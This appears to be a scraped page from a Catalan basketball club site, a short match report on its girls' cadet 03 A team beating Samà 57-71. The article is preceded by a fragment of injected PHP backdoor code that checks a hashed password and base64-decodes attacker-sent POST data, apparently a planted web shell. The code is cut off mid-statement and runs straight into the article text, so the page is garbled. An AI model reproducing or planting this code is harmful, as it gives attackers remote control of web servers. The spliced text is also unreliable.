function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 03 A recupera moltes pilotes en el tercer quart i derrota el Samà (57-71) - Tgn Bàsquet Club -

El cadet femení 03 A recupera moltes pilotes en el tercer quart i derrota el Samà (57-71)

Updated: març 26, 2019

El cadet femení 03 A va sentenciar el partit contra el Samà després del descans. L’equip que entrena Manuel Rubio va augmentar la seva pressió defensiva en el tercer quart i això li va permetre recuperar moltes pilotes i anotar a còpia de contraatacs. El parcial en aquests deu minuts va ser de 12-27 i l’avantatge aconseguit va servir per a certificar una nova victòria lila.